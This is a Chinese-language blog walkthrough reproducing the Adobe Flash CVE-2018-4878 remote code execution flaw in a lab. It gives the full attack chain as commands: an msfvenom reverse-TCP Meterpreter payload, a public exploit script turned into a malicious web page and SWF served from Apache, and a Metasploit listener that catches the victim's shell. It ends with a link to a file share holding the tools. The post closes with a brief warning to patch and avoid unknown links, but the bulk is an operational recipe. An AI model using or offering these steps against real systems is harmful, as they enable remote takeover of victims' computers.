Adobe Flash cve-2018-4878 的漏洞復現

漏洞概述
2018年2月1日, Adobe官方發佈了Adobe Flash Player系列產品的安全通告(APSA18-01),該0day漏洞編號爲CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影響,Adobe官方於2月5日發佈此漏洞補丁。
***者可以將惡意Flash文件嵌入Office文檔,網頁,或者桌面應用,當用戶打開時便會收到***
此次復現爲網頁鏈接的方式進行復現受害者訪問我們的flash鏈接就會被遠程代碼執行並且直接被getshell
***主機:Kali linux ip:172.16.221.213
受害者主機 window7 ip:172.16.221.247
實驗用到的工具會在文章末尾分享
***主機配置
1.首先解壓我們用到的文件
unzip CVE-2018-4878-master.zip
Adobe Flash cve-2018-4878 的漏洞復現
2.用msfvenom生成shell代碼
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.221.213 LPORT=4444 -f python > code.txt
-p –payload < payload> 指定需要使用的payload
windows/meterpreter/reverse_tcp 我們選擇使用的***載荷
LHOST指定ip地址
LPORT指定監聽的端口可任意更改
-f –format < format> 指定輸出格式 (使用 –help-formats 來獲取msf支持的輸出格式列表)
Adobe Flash cve-2018-4878 的漏洞復現
(1)查看代碼文件
cat code.txt
Adobe Flash cve-2018-4878 的漏洞復現
(2)進入到我們解壓用到的文件目錄,編輯cve-2018-4878.py文件
Adobe Flash cve-2018-4878 的漏洞復現
修改下面的文件路徑
Adobe Flash cve-2018-4878 的漏洞復現

    別忘了保存修改並退出

3.python執行腳本文件
python cve-2017-4878-master.py
Adobe Flash cve-2018-4878 的漏洞復現
ls 查看到生成了兩個文件
4.啓動Apache服務
(1)service apache2 startAdobe Flash cve-2018-4878 的漏洞復現
我們可以看到已經啓動成功了
(2)將我們上兩個文件複製到apache2服務的網頁目錄
cp exlpoit.html /var/www/html/exploit.html
cp exploit.swf /var/www/html/exploit.swf
Adobe Flash cve-2018-4878 的漏洞復現
現在我們的***環境基本配置完成,只要受害者訪問我的鏈接就可以直接被遠程控制
5.啓動armitage:屬於圖形化的metasploit也方便演示
Adobe Flash cve-2018-4878 的漏洞復現
(1)使用handler監聽模塊
use exploit/multi/handlerAdobe Flash cve-2018-4878 的漏洞復現
(2)設置***載荷是我們在生成文件的時候所選擇的***載荷
set payload windows/meterpreter/reverse_tcp
Adobe Flash cve-2018-4878 的漏洞復現
set lhost 172.16.221.213 設置***主機的ip
set lport 4444 設置監聽端口爲4444(我們在用msfvenom生成代碼文件是設置的端口)
6.開啓監聽
exploit
Adobe Flash cve-2018-4878 的漏洞復現
7.windows7安裝Adobeflash 28.0 後用瀏覽器訪問http://172.16.221.213/exploit.html
Adobe Flash cve-2018-4878 的漏洞復現
8.此時我們可以看到Kali linux已經獲取到sessions
Adobe Flash cve-2018-4878 的漏洞復現
復現完成,此時我們就可以查看一下系統配置
Adobe Flash cve-2018-4878 的漏洞復現
當然你也可以不用此圖形化直接用命令行(命令都是一樣的)
msfconsole 啓動
Adobe Flash cve-2018-4878 的漏洞復現
Adobe Flash cve-2018-4878 的漏洞復現
順便用shell查看下ip地址
在真實環境下,很多***會基於社會工程學誘導用戶點擊來達到***的目的,也希望大家小心陌生鏈接及時升級安全補丁,以免造成損失
工具鏈接:鏈接:https://pan.baidu.com/s/1kGmB2eZWf9PBFeXzyxOnkg 密碼:ut52

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章